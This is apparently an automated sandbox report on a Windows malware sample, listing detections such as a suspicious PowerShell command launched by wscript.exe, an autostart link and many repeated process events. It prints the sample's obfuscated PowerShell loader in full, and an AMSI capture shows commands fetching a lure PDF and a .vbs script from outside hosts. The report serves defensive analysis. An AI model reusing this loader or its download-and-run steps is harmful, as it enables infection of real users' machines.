          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887C11B09 push es; iretd 0_2_00007FF887C11B0A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887CE7613 push edi; ret 0_2_00007FF887CE7616
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF887C11B7A push F887CF02h; iretd 3_2_00007FF887C11BB2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF887CE0D6C push eax; ret 3_2_00007FF887CE0D6D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF887CB54F3 push esi; retf 7_2_00007FF887CB54FA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF887CB5479 push esp; retf 7_2_00007FF887CB54F2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF887CB5479 push ebp; iretd 7_2_00007FF887CB5538
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF887CB9CB0 pushfd ; retf 7_2_00007FF887CB9CB2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF887CB569D push edi; retf 7_2_00007FF887CB5722
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF887CB09B9 push cs; retf 7_2_00007FF887CB0E12
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF887CB99F3 pushfd ; retf 7_2_00007FF887CB99FA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF887CB54FB push ebp; iretd 7_2_00007FF887CB5538

          Boot Survival

          barindex
          Powershell creates an autostart link
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htc5nwww.fornid.com/wh/List%20of%20rznvquirznvd%20itznvms%20and%20sznvrvicznvs.pdf';getit -fz $flol -oulv 'htc5nwww.pinznvapplznvtznvch.aznv/na/mg.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this mod

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
